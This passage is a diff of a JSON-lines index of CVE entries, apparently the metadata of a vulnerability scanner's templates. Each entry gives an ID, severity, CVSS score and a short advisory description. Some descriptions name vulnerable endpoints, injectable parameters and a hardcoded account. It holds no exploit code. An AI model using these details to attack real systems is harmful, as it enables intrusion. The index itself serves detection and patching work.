misconfigured in such a way that the Proxy Error page was displayed.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-10092.yaml"} +{"ID":"CVE-2019-10098","Info":{"Name":"Apache HTTP server v2.4.0 to v2.4.39 - Open Redirect","Severity":"medium","Description":"In Apache HTTP server 2.4.0 to 2.4.39, Redirects configured with mod_rewrite that were intended to be self-referential might be fooled by encoded newlines and redirect instead to an unexpected URL within the request URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-10098.yaml"} {"ID":"CVE-2019-1010287","Info":{"Name":"Timesheet Next Gen \u003c=1.5.3 - Cross-Site Scripting","Severity":"medium","Description":"Timesheet Next Gen 1.5.3 and earlier is vulnerable to cross-site scripting that allows an attacker to execute arbitrary HTML and JavaScript code via a \"redirect\" parameter. The component is: Web login form: login.php, lines 40 and 54. The attack vector is: reflected XSS, victim may click the malicious url.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-1010287.yaml"} {"ID":"CVE-2019-1010290","Info":{"Name":"Babel - Open Redirect","Severity":"medium","Description":"Babel contains an open redirect vulnerability via redirect.php in the newurl parameter. An attacker can use any legitimate site using Babel to redirect user to a malicious site, thus possibly obtaining sensitive information, modifying data, and/or executing unauthorized operations.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-1010290.yaml"} {"ID":"CVE-2019-10232","Info":{"Name":"Teclib GLPI \u003c= 9.3.3 - Unauthenticated SQL Injection","Severity":"critical","Description":"Teclib GLPI \u003c= 9.3.3 exposes a script (/scripts/unlock_tasks.php) that incorrectly sanitizes user controlled data before using it in SQL queries. Thus, an attacker could abuse the affected feature to alter the semantic original SQL query and retrieve database records.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-10232.yaml"} @@ -655,6 +670,7 @@ {"ID":"CVE-2019-18957","Info":{"Name":"MicroStrategy Library \u003c11.1.3 - Cross-Site Scripting","Severity":"medium","Description":"MicroStrategy Library before 11.1.3 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-18957.yaml"} {"ID":"CVE-2019-19134","Info":{"Name":"WordPress Hero Maps Premium \u003c=2.2.1 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Hero Maps Premium plugin 2.2.1 and prior contains an unauthenticated reflected cross-site scripting vulnerability via the views/dashboard/index.php p parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-19134.yaml"} {"ID":"CVE-2019-19368","Info":{"Name":"Rumpus FTP Web File Manager 8.2.9.1 - Cross-Site Scripting","Severity":"medium","Description":"Rumpus FTP Web File Manager 8.2.9.1 contains a reflected cross-site scripting vulnerability via the Login page. An attacker can send a crafted link to end users and can execute arbitrary JavaScript.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-19368.yaml"} +{"ID":"CVE-2019-1943","Info":{"Name":"Cisco Small Business 200,300 and 500 Series Switches - Open Redirect","Severity":"medium","Description":"Cisco Small Business 200,300 and 500 Series Switches contain an open redirect vulnerability in the Web UI. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"4.7"}},"file_path":"http/cves/2019/CVE-2019-1943.yaml"} {"ID":"CVE-2019-19781","Info":{"Name":"Citrix ADC and Gateway - Directory Traversal","Severity":"critical","Description":"Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0 are susceptible to directory traversal vulnerabilities.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-19781.yaml"} {"ID":"CVE-2019-19824","Info":{"Name":"TOTOLINK Realtek SD Routers - Remote Command Injection","Severity":"high","Description":"TOTOLINK Realtek SDK based routers may allow an authenticated attacker to execute arbitrary OS commands via the sysCmd parameter to the boafrm/formSysCmd URI, even if the GUI (syscmd.htm) is not available. This allows for full control over the device's internals. This affects A3002RU through 2.0.0, A702R through 2.1.3, N301RT through 2.1.6, N302R through 3.4.0, N300RT through 3.4.0, N200RE through 4.0.0, N150RT through 3.4.0, and N100RE through 3.4.0.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2019/CVE-2019-19824.yaml"} {"ID":"CVE-2019-19908","Info":{"Name":"phpMyChat-Plus 1.98 - Cross-Site Scripting","Severity":"medium","Description":"phpMyChat-Plus 1.98 contains a cross-site scripting vulnerability via pmc_username parameter of pass_reset.php in password reset URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-19908.yaml"} @@ -673,6 +689,7 @@ {"ID":"CVE-2019-2729","Info":{"Name":"Oracle WebLogic Server Administration Console - Remote Code Execution","Severity":"critical","Description":"The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services) versions 0.3.6.0.0, 12.1.3.0.0 and 12.2.1.3.0 contain an easily exploitable vulnerability that allows unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-2729.yaml"} {"ID":"CVE-2019-2767","Info":{"Name":"Oracle Business Intelligence Publisher - XML External Entity Injection","Severity":"high","Description":"Oracle Business Intelligence Publisher is vulnerable to an XML external entity injection attack. The supported versions affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. This easily exploitable vulnerability allows unauthenticated attackers with network access via HTTP to compromise BI Publisher.","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2019/CVE-2019-2767.yaml"} {"ID":"CVE-2019-3396","Info":{"Name":"Atlassian Confluence Server - Path Traversal","Severity":"critical","Description":"The Widget Connector macro in Atlassian Confluence Server before version 6.6.12 (the fixed version for 6.6.x), from version 6.7.0 before 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 before 6.13.3 (the fixed version for 6.13.x), and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x), allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-3396.yaml"} +{"ID":"CVE-2019-3398","Info":{"Name":"Atlassian Confluence Download Attachments - Remote Code Execution","Severity":"high","Description":"Confluence Server and Data Center had a path traversal vulnerability in the downloadallattachments resource. A remote attacker who has permission to add attachments to pages and / or blogs or to create a new space or a personal space or who has 'Admin' permissions for a space can exploit this path traversal vulnerability to write files to arbitrary locations which can lead to remote code execution on systems that run a vulnerable version of Confluence Server or Data Center.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2019/CVE-2019-3398.yaml"} {"ID":"CVE-2019-3401","Info":{"Name":"Atlassian Jira \u003c7.13.3/8.0.0-8.1.1 - Incorrect Authorization","Severity":"medium","Description":"Atlasssian Jira before version 7.13.3 and from version 8.0.0 before version 8.1.1 is susceptible to incorrect authorization. The ManageFilters.jspa resource allows a remote attacker to enumerate usernames via an incorrect authorization check, thus possibly obtaining sensitive information, modifying data, and/or executing unauthorized operations.","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2019/CVE-2019-3401.yaml"} {"ID":"CVE-2019-3402","Info":{"Name":"Jira \u003c 8.1.1 - Cross-Site Scripting","Severity":"medium","Description":"Jira before 8.1.1 contains a cross-site scripting vulnerability via ConfigurePortalPages.jspa resource in the searchOwnerUserName parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-3402.yaml"} {"ID":"CVE-2019-3403","Info":{"Name":"Jira - Incorrect Authorization","Severity":"medium","Description":"Jira before version 7.13.3, from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1 is susceptible to an incorrect authorization check in the /rest/api/2/user/picker rest resource, enabling an attacker to enumerate usernames and gain improper access.","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2019/CVE-2019-3403.yaml"} @@ -692,7 +709,7 @@ {"ID":"CVE-2019-7238","Info":{"Name":"Sonatype Nexus Repository Manager \u003c3.15.0 - Remote Code Execution","Severity":"critical","Description":"Sonatype Nexus Repository Manager before 3.15.0 is susceptible to remote code execution.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-7238.yaml"} {"ID":"CVE-2019-7254","Info":{"Name":"eMerge E3 1.00-06 - Local File Inclusion","Severity":"high","Description":"Linear eMerge E3-Series devices are vulnerable to local file inclusion.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2019/CVE-2019-7254.yaml"} {"ID":"CVE-2019-7255","Info":{"Name":"Linear eMerge E3 - Cross-Site Scripting","Severity":"medium","Description":"Linear eMerge E3-Series devices are vulnerable to cross-site scripting via the 'layout' parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-7255.yaml"} -{"ID":"CVE-2019-7256","Info":{"Name":"eMerge E3 1.00-06 - Remote Code Execution","Severity":"critical","Description":"Linear eMerge E3-Series devices are susceptible to remote code execution vulnerabilities.","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2019/CVE-2019-7256.yaml"} +{"ID":"CVE-2019-7256","Info":{"Name":"eMerge E3 1.00-06 - Remote Code Execution","Severity":"critical","Description":"Linear eMerge E3-Series devices are susceptible to remote code execution vulnerabilities.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2019/CVE-2019-7256.yaml"} {"ID":"CVE-2019-7275","Info":{"Name":"Optergy Proton/Enterprise Building Management System - Open Redirect","Severity":"medium","Description":"Optergy Proton/Enterprise Building Management System contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-7275.yaml"} {"ID":"CVE-2019-7315","Info":{"Name":"Genie Access WIP3BVAF IP Camera - Local File Inclusion","Severity":"high","Description":"Genie Access WIP3BVAF WISH IP 3MP IR Auto Focus Bullet Camera devices through 3.X are vulnerable to local file inclusion via the web interface, as demonstrated by reading /etc/shadow.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2019/CVE-2019-7315.yaml"} {"ID":"CVE-2019-7481","Info":{"Name":"SonicWall SRA 4600 VPN - SQL Injection","Severity":"high","Description":"The SonicWall SRA 4600 VPN appliance is susceptible to a pre-authentication SQL injection vulnerability.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2019/CVE-2019-7481.yaml"} @@ -731,6 +748,7 @@ {"ID":"CVE-2020-11529","Info":{"Name":"Grav \u003c1.7 - Open Redirect","Severity":"medium","Description":"Grav before 1.7 has an open redirect vulnerability via common/Grav.php. This is partially fixed in 1.6.23 and still present in 1.6.x.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2020/CVE-2020-11529.yaml"} {"ID":"CVE-2020-11530","Info":{"Name":"WordPress Chop Slider 3 - Blind SQL Injection","Severity":"critical","Description":"WordPress Chop Slider 3 plugin contains a blind SQL injection vulnerability via the id GET parameter supplied to get_script/index.php. The plugin can allow an attacker to execute arbitrary SQL queries in the context of the WP database user, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-11530.yaml"} {"ID":"CVE-2020-11546","Info":{"Name":"SuperWebmailer 7.21.0.01526 - Remote Code Execution","Severity":"critical","Description":"SuperWebMailer 7.21.0.01526 is susceptible to a remote code execution vulnerability in the Language parameter of mailingupgrade.php. An unauthenticated remote attacker can exploit this behavior to execute arbitrary PHP code via Code Injection.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-11546.yaml"} +{"ID":"CVE-2020-11547","Info":{"Name":"PRTG Network Monitor \u003c20.1.57.1745 - Information Disclosure","Severity":"medium","Description":"PRTG Network Monitor before 20.1.57.1745 is susceptible to information disclosure. An attacker can obtain information about probes running or the server itself via an HTTP request, thus potentially being able to modify data and/or execute unauthorized administrative operations in the context of the affected site.","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2020/CVE-2020-11547.yaml"} {"ID":"CVE-2020-11710","Info":{"Name":"Kong Admin \u003c=2.03 - Admin API Access","Severity":"critical","Description":"Kong Admin through 2.0.3 contains an issue via docker-kong which makes the admin API port accessible on interfaces other than 127.0.0.1.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-11710.yaml"} {"ID":"CVE-2020-11738","Info":{"Name":"WordPress Duplicator 1.3.24 \u0026 1.3.26 - Local File Inclusion","Severity":"high","Description":"WordPress Duplicator 1.3.24 \u0026 1.3.26 are vulnerable to local file inclusion vulnerabilities that could allow attackers to download arbitrary files, such as the wp-config.php file. According to the vendor, the vulnerability was only in two\nversions v1.3.24 and v1.3.26, the vulnerability wasn't\npresent in versions 1.3.22 and before.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2020/CVE-2020-11738.yaml"} {"ID":"CVE-2020-11853","Info":{"Name":"Micro Focus Operations Bridge Manager \u003c=2020.05 - Remote Code Execution","Severity":"high","Description":"Micro Focus Operations Bridge Manager in versions 2020.05 and below is vulnerable to remote code execution via UCMDB. The vulnerability allows remote attackers to execute arbitrary code on affected installations of Data Center Automation. An attack requires network access and authentication as a valid application user. Originated from Metasploit module (#14654).\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2020/CVE-2020-11853.yaml"} @@ -746,7 +764,7 @@ {"ID":"CVE-2020-12720","Info":{"Name":"vBulletin SQL Injection","Severity":"critical","Description":"vBulletin before 5.5.6pl1, 5.6.0 before 5.6.0pl1, and 5.6.1 before 5.6.1pl1 has incorrect access control that permits SQL injection attacks.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-12720.yaml"} {"ID":"CVE-2020-12800","Info":{"Name":"WordPress Contact Form 7 \u003c1.3.3.3 - Remote Code Execution","Severity":"critical","Description":"WordPress Contact Form 7 before 1.3.3.3 allows unrestricted file upload and remote code execution by setting supported_type to php% and uploading a .php% file.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-12800.yaml"} {"ID":"CVE-2020-13117","Info":{"Name":"Wavlink Multiple AP - Remote Command Injection","Severity":"critical","Description":"Wavlink products are affected by a vulnerability that may allow remote unauthenticated users to execute arbitrary commands as root on Wavlink devices. The user input is not properly sanitized which allows command injection via the \"key\" parameter in a login request. It has been tested on Wavlink WN575A4 and WN579X3 devices, but other products may also be affected.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-13117.yaml"} -{"ID":"CVE-2020-13121","Info":{"Name":"Submitty \u003c= 20.04.01 - Open Redirect","Severity":"medium","Description":"Submitty through 20.04.01 contains an open redirect vulnerability via authentication/login?old= during an invalid login attempt. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.","Classification":{"CVSSScore":"6.10"}},"file_path":"http/cves/2020/CVE-2020-13121.yaml"} +{"ID":"CVE-2020-13121","Info":{"Name":"Submitty \u003c= 20.04.01 - Open Redirect","Severity":"medium","Description":"Submitty through 20.04.01 contains an open redirect vulnerability via authentication/login?old= during an invalid login attempt. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2020/CVE-2020-13121.yaml"} {"ID":"CVE-2020-13158","Info":{"Name":"Artica Proxy Community Edition \u003c4.30.000000 - Local File Inclusion","Severity":"high","Description":"Artica Proxy Community Edition before 4.30.000000 is vulnerable to local file inclusion via the fw.progrss.details.php popup parameter.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2020/CVE-2020-13158.yaml"} {"ID":"CVE-2020-13167","Info":{"Name":"Netsweeper \u003c=6.4.3 - Python Code Injection","Severity":"critical","Description":"Netsweeper through 6.4.3 allows unauthenticated remote code execution because webadmin/tools/unixlogin.php (with certain Referer headers) launches a command line with client-supplied parameters, and allows injection of shell metacharacters.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-13167.yaml"} {"ID":"CVE-2020-13258","Info":{"Name":"Contentful \u003c=2020-05-21 - Cross-Site Scripting","Severity":"medium","Description":"Contentful through 2020-05-21 for Python contains a reflected cross-site scripting vulnerability via the api parameter to the-example-app.py.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2020/CVE-2020-13258.yaml"} @@ -768,7 +786,7 @@ {"ID":"CVE-2020-14750","Info":{"Name":"Oracle WebLogic Server - Remote Command Execution","Severity":"critical","Description":"Oracle WebLogic Server 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0 is susceptible to remote code execution. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised machine without entering necessary credentials. See also CVE-2020-14882, which is addressed in the October 2020 Critical Patch Update.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-14750.yaml"} {"ID":"CVE-2020-14864","Info":{"Name":"Oracle Fusion - Directory Traversal/Local File Inclusion","Severity":"high","Description":"Oracle Business Intelligence Enterprise Edition 5.5.0.0.0, 12.2.1.3.0, and 12.2.1.4.0 are vulnerable to local file inclusion vulnerabilities via \"getPreviewImage.\"","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2020/CVE-2020-14864.yaml"} {"ID":"CVE-2020-14882","Info":{"Name":"Oracle Weblogic Server - Remote Command Execution","Severity":"critical","Description":"Oracle WebLogic Server contains an easily exploitable remote command execution vulnerability which allows unauthenticated attackers with network access via HTTP to compromise the server.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-14882.yaml"} -{"ID":"CVE-2020-14883","Info":{"Name":"Oracle Fusion Middleware WebLogic Server Administration Console - Remote Code Execution","Severity":"high","Description":"The Oracle Fusion Middleware WebLogic Server admin console in versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0 is vulnerable to an easily exploitable vulnerability that allows high privileged attackers with network access via HTTP to compromise Oracle WebLogic Server.","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2020/CVE-2020-14883.yaml"} +{"ID":"CVE-2020-14883","Info":{"Name":"Oracle Fusion Middleware WebLogic Server Administration Console - Remote Code Execution","Severity":"high","Description":"The Oracle Fusion Middleware WebLogic Server admin console in versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0 is vulnerable to an easily exploitable vulnerability that allows high privileged attackers with network access via HTTP to compromise Oracle WebLogic Server.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2020/CVE-2020-14883.yaml"} {"ID":"CVE-2020-15050","Info":{"Name":"Suprema BioStar \u003c2.8.2 - Local File Inclusion","Severity":"high","Description":"Suprema BioStar before 2.8.2 Video Extension allows remote attackers can read arbitrary files from the server via local file inclusion.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2020/CVE-2020-15050.yaml"} {"ID":"CVE-2020-15129","Info":{"Name":"Traefik - Open Redirect","Severity":"medium","Description":"Traefik before 1.7.26, 2.2.8, and 2.3.0-rc3 contains an open redirect vulnerability in the X-Forwarded-Prefix header. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.","Classification":{"CVSSScore":"4.7"}},"file_path":"http/cves/2020/CVE-2020-15129.yaml"} {"ID":"CVE-2020-15148","Info":{"Name":"Yii 2 \u003c 2.0.38 - Remote Code Execution","Severity":"critical","Description":"Yii 2 (yiisoft/yii2) before version 2.0.38 is vulnerable to remote code execution if the application calls `unserialize()` on arbitrary user input.","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2020/CVE-2020-15148.yaml"} @@ -798,6 +816,7 @@ {"ID":"CVE-2020-19295","Info":{"Name":"Jeesns 1.4.2 - Cross-Site Scripting","Severity":"medium","Description":"Jeesns 1.4.2 is vulnerable to reflected cross-site scripting in the /weibo/topic component and allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the system error message's text field.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2020/CVE-2020-19295.yaml"} {"ID":"CVE-2020-19360","Info":{"Name":"FHEM 6.0 - Local File Inclusion","Severity":"high","Description":"FHEM version 6.0 suffers from a local file inclusion vulnerability.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2020/CVE-2020-19360.yaml"} {"ID":"CVE-2020-1943","Info":{"Name":"Apache OFBiz \u003c=16.11.07 - Cross-Site Scripting","Severity":"medium","Description":"Apache OFBiz 16.11.01 to 16.11.07 is vulnerable to cross-site scripting because data sent with contentId to /control/stream is not sanitized.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2020/CVE-2020-1943.yaml"} +{"ID":"CVE-2020-1956","Info":{"Name":"Apache Kylin 3.0.1 - Command Injection Vulnerability","Severity":"high","Description":"Apache Kylin 2.3.0, and releases up to 2.6.5 and 3.0.1 has some restful apis which will concatenate os command with the user input string, a user is likely to be able to execute any os command without any protection or validation.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2020/CVE-2020-1956.yaml"} {"ID":"CVE-2020-19625","Info":{"Name":"Gridx 1.3 - Remote Code Execution","Severity":"critical","Description":"Gridx 1.3 is susceptible to remote code execution via tests/support/stores/test_grid_filter.php, which allows remote attackers to execute arbitrary code via crafted values submitted to the $query parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-19625.yaml"} {"ID":"CVE-2020-20285","Info":{"Name":"ZZcms - Cross-Site Scripting","Severity":"medium","Description":"ZZcms 2019 contains a cross-site scripting vulnerability in the user login page. An attacker can inject arbitrary JavaScript code in the referer header via user/login.php, which can allow theft of cookie-based credentials and launch of subsequent attacks.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2020/CVE-2020-20285.yaml"} {"ID":"CVE-2020-20300","Info":{"Name":"WeiPHP 5.0 - SQL Injection","Severity":"critical","Description":"WeiPHP 5.0 contains a SQL injection vulnerability via the wp_where function. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-20300.yaml"} @@ -870,6 +889,7 @@ {"ID":"CVE-2020-29284","Info":{"Name":"Sourcecodester Multi Restaurant Table Reservation System 1.0 - SQL Injection","Severity":"critical","Description":"Sourcecodester Multi Restaurant Table Reservation System 1.0 contains a SQL injection vulnerability via the file view-chair-list.php. It does not perform input validation on the table_id parameter, which allows unauthenticated SQL injection. An attacker can send malicious input in the GET request to /dashboard/view-chair-list.php?table_id= to trigger the vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-29284.yaml"} {"ID":"CVE-2020-29395","Info":{"Name":"Wordpress EventON Calendar 3.0.5 - Cross-Site Scripting","Severity":"medium","Description":"Wordpress EventON Calendar 3.0.5 is vulnerable to cross-site scripting because it allows addons/?q= XSS via the search field.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2020/CVE-2020-29395.yaml"} {"ID":"CVE-2020-29453","Info":{"Name":"Jira Server Pre-Auth - Arbitrary File Retrieval (WEB-INF, META-INF)","Severity":"medium","Description":"The CachingResourceDownloadRewriteRule class in Jira Server and Jira Data Center allowed unauthenticated remote attackers to read arbitrary files within WEB-INF and META-INF directories via an incorrect path access check.","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2020/CVE-2020-29453.yaml"} +{"ID":"CVE-2020-29583","Info":{"Name":"ZyXel USG - Hardcoded Credentials","Severity":"critical","Description":"A hardcoded credential vulnerability was identified in the 'zyfwp' user account in some Zyxel firewalls and AP controllers. The account was designed to deliver automatic firmware updates to connected access points through FTP.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-29583.yaml"} {"ID":"CVE-2020-29597","Info":{"Name":"IncomCMS 2.0 - Arbitrary File Upload","Severity":"critical","Description":"IncomCMS 2.0 has a an insecure file upload vulnerability in modules/uploader/showcase/script.php. This allows unauthenticated attackers to upload files into the server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-29597.yaml"} {"ID":"CVE-2020-3187","Info":{"Name":"Cisco Adaptive Security Appliance Software/Cisco Firepower Threat Defense - Directory Traversal","Severity":"critical","Description":"Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software are susceptible to directory traversal vulnerabilities that could allow an unauthenticated, remote attacker to obtain read and delete access to sensitive files on a targeted system.","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2020/CVE-2020-3187.yaml"} {"ID":"CVE-2020-3452","Info":{"Name":"Cisco Adaptive Security Appliance (ASA)/Firepower Threat Defense (FTD) - Local File Inclusion","Severity":"high","Description":"Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software is vulnerable to local file inclusion due to directory traversal attacks that can read sensitive files on a targeted system because of a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2020/CVE-2020-3452.yaml"} @@ -886,13 +906,13 @@ {"ID":"CVE-2020-35774","Info":{"Name":"twitter-server Cross-Site Scripting","Severity":"medium","Description":"twitter-server before 20.12.0 is vulnerable to cross-site scripting in some configurations. The vulnerability exists in the administration panel of twitter-server in the histograms component via server/handler/HistogramQueryHandler.scala.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2020/CVE-2020-35774.yaml"} {"ID":"CVE-2020-3580","Info":{"Name":"Cisco ASA/FTD Software - Cross-Site Scripting","Severity":"medium","Description":"Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software are vulnerable to cross-site scripting and could allow an unauthenticated, remote attacker to conduct attacks against a user of the web services interface of an affected device. The vulnerabilities are due to insufficient validation of user-supplied input by the web services interface of an affected device. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive, browser-based information. Note: These vulnerabilities affect only specific AnyConnect and WebVPN configurations. For more information, see the reference links.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2020/CVE-2020-3580.yaml"} {"ID":"CVE-2020-35846","Info":{"Name":"Agentejo Cockpit \u003c 0.11.2 - NoSQL Injection","Severity":"critical","Description":"Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php check function. The $eq operator matches documents where the value of a field equals the specified value.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-35846.yaml"} -{"ID":"CVE-2020-35847","Info":{"Name":"Agentejo Cockpit \u003c0.11.2 - NoSQL Injection","Severity":"critical","Description":"Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php resetpassword function of the Auth controller.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-35847.yaml"} +{"ID":"CVE-2020-35847","Info":{"Name":"Agentejo Cockpit \u003c0.11.2 - NoSQL Injection","Severity":"critical","Description":"Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php resetpassword function of the Auth controller.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-35847.yaml"} {"ID":"CVE-2020-35848","Info":{"Name":"Agentejo Cockpit \u003c0.12.0 - NoSQL Injection","Severity":"critical","Description":"Agentejo Cockpit prior to 0.12.0 is vulnerable to NoSQL Injection via the newpassword method of the Auth controller, which is responsible for displaying the user password reset form.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-35848.yaml"} {"ID":"CVE-2020-35951","Info":{"Name":"Wordpress Quiz and Survey Master \u003c7.0.1 - Arbitrary File Deletion","Severity":"critical","Description":"Wordpress Quiz and Survey Master \u003c7.0.1 allows users to delete arbitrary files such as wp-config.php file, which could effectively take a site offline and allow an attacker to reinstall with a WordPress instance under their control. This occurred via qsm_remove_file_fd_question, which allowed unauthenticated deletions (even though it was only intended for a person to delete their own quiz-answer files).","Classification":{"CVSSScore":"9.9"}},"file_path":"http/cves/2020/CVE-2020-35951.yaml"} {"ID":"CVE-2020-36112","Info":{"Name":"CSE Bookstore 1.0 - SQL Injection","Severity":"critical","Description":"CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successful exploitation of this vulnerability will lead to an attacker dumping the entire database.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-36112.yaml"} {"ID":"CVE-2020-36289","Info":{"Name":"Jira Server and Data Center - Information Disclosure","Severity":"medium","Description":"Jira Server and Data Center is susceptible to information disclosure. An attacker can enumerate users via the QueryComponentRendererValue!Default.jspa endpoint and thus potentially access sensitive information, modify data, and/or execute unauthorized operations, Affected versions are before version 8.5.13, from version 8.6.0 before 8.13.5, and from version 8.14.0 before 8.15.1.","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2020/CVE-2020-36289.yaml"} {"ID":"CVE-2020-36365","Info":{"Name":"Smartstore \u003c4.1.0 